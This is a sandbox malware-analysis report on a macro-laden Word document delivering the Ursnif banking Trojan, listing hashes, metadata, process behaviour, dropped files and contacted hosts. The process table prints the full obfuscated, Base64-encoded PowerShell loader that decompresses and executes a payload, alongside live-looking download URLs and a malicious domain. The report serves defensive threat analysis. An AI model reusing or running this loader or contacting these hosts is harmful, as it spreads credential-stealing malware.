analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_07.18_2.doc

Full analysis: https://app.any.run/tasks/1f8d3e16-2177-491d-ac06-e34901916fd6
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: July 18, 2019, 14:57:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
gozi
ursnif
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: hbpnoivevshdwcutyyumi, Subject: puyxkjeqzxvpakwfkexcfoyzno, Author: tynshaggckrxcvxsh, Comments: ixzy, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Jul 17 22:28:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

FE9A59F38D58637B48EADA7D96AEE6ED

SHA1:

B9ED25C6D4555A4A7FAAA50591EC5D2A2D80CCDB

SHA256:

4760292C32DF4BD36889B66ED3644C0CA4866FCF058C5F1A14A38F0C287EFBB3

SSDEEP:

768:i2vVa0tBT2hiarmnA2WwFPFG6P4QvLAHBV3h4N6V3ylD8xz99SqqeKYz3AWp:iEihp0d186wQmBV3eU9ylD83d/N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • URSNIF was detected

      • powershell.exe (PID: 2500)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2968)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2968)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2500)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2968)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 23552
Company: gllvpqxlaetkhhckxsnppfqbvz
Manager: vhvsazaioybqug
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:07:17 21:28:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 3.0 minutes
Software: Microsoft Office Word
RevisionNumber: 11
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: ixzy
Keywords: -
Author: tynshaggckrxcvxsh
Subject: puyxkjeqzxvpakwfkexcfoyzno
Title: hbpnoivevshdwcutyyumi
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_07.18_2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2500"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAYgBiADQASgBBAEUASQBYAGYAbQAvAFEALwA3AEEAUABOAEwAcQBFAHUAMABoAG8ATgBFAHQASQAwAFkAaAB0AFMAaQA4AFoATABiAE4ASQAyAEUAWABHADQAdABNAGgAdQAyAEYAVgBBAHcAMwA4AHYAVABkAFQAMgBaAGUAYgBsAG4ASgBuAHoASABjAFcAdABYAE8ANgAvAHoASgBDAE4AOABQAHAAcAA5AG8AbwB0AFoAYwBFAEwAdgBsAHoAYQBDAG0AVAA3AC8AawA1AEEAegBuAE0AVwBKAGkAbABvACsAQQBOAHIAeQBrAG0AdQBZAFEAbwBsAE4ARwBMAFcAQwBjADMARgB4AHEAWQBFAFoAMQBqAEQAVQBMAFIAWQBzADkAWgBmAEUARQBpAHMASQBnADkAVwA4AHgAVgBkAHcAbgBvADEARwBDAFgAZwB6AFMAMQBsAHYANQBzADYANAA4AGYARAB3AE0AYQB4AGwATAB5AHYANgA1AHUAeQBiAFoAaQBsAFMAQQAzAHUAQgAwAEQATAA2AHEAQwBMAHEAbQBCADYARwBEAEYAVwBVAEIANwB6AGgAOQBRAFcAcwBvAEwAYwBwAEYARwBaAFkAaQBwADQAbQBrAGkAQwBiADcAQgBxAGgAUwB3AEgAUAA0AGkASgA0AGsANwA0AHQAdQBNAGwAUwA1AFIAawA2AFAASgBBAFAAYwBxADgATwBwADcAaQBVAFkAYwBWAFgAcwBwADgASgAzAFQAVAA0AFoALwBoAEYAcAAxAFkAVgBjAHMATgBFAFMARQBOAHgARABQAEkAbAB0AHMAUQBTAEcAagBHAHQAawBFADQASwAyAGcANgA5AEoANQBsAGoARgBvAFIAbwBEAHUAegAxADEAUABSADgAZAAxAEoALwBDAGgAagBRAGkAYQBCAG8ASgBPAGMAQgBTAEQARQBaADcAOAAvAG0ALwB0AFQAUwBTADYAWAAxADAAMwBLAGIANgB1AHUAQQAxADgARwA4AGIARwB1AEwAZQBRAE8AMwA4AGkALwBZAE4AbABvADcARABzAHoAbQBiAHQAWgBSAE0ANgB0AEcARwAyAFQARwBtAGEAWABHAHQAMABPADcAWgBuADYALwBXADgAVABXAEYAVwB0ADYANgBzAGYAJwApACAALABbAHMAWQBzAFQAZQBtAC4AaQBvAC4AYwBPAE0AcABSAGUAUwBzAGkATwBOAC4AQwBvAG0AcAByAGUAcwBzAEkATwBOAE0ATwBEAEUAXQA6ADoARABFAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAmACgAJwBmACcAKwAnAG8AcgBlACcAKwAnAGEAYwBIACcAKQB7ACAAJgAoACcATgBFAFcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAGkAYABvAC4AYABTAGAAVAByAGUAYQBtAFIARQBBAEQARQBSACgAJABfACwAWwBzAHkAUwBUAGUAbQAuAFQARQB4AFQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAYQBzAEMAaQBpACkAIAB9AHwALgAoACcARgBvAHIARQBhACcAKwAnAEMAJwArACcASAAnACkAewAkAF8ALgByAGUAYQBkAHQAbwBlAG4AZAAoACkAIAB9ACAAKQAgAHwALgAoACcASQAnACsAJwBFACcAIAArACAAJwBYACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 353
Read events
893
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA827.tmp.cvr
MD5:
SHA256:
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZG9IH14WYPJ4BLV1AFEJ.temp
MD5:
SHA256:
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17b640.TMPbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F2DE1431816F1A887F11E37F0E5B78C1
SHA256:AC75C28502BA69F35891655C9ADFC2B4C73730F00CE0F6C22519E9B5B48762BD
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:0849FBC8A33EAFC27DAB5CE2F1B2C788
SHA256:53B9FBB2FE3FD046AB0B176D78806DCA10ACF4B6A2EFA308893270EDF96EA9E5
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fo_07.18_2.docpgc
MD5:10AD57DB6582DFCD99A9D755814CAF11
SHA256:49D742531A8DE06BF77F9E990CF2A3C9927C334E68E7C5B497E994651E31909F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2500
powershell.exe
GET
109.196.164.79:80
http://109.196.164.79/3.php
unknown
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2500
powershell.exe
147.78.66.46:80
dx019xsl1pace.xyz
suspicious
2500
powershell.exe
109.196.164.79:80
suspicious

DNS requests

Domain
IP
Reputation
dx019xsl1pace.xyz
  • 147.78.66.46
malicious

Threats

PID
Process
Class
Message
2500
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
2500
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1 ETPRO signatures available at the full report
No debug info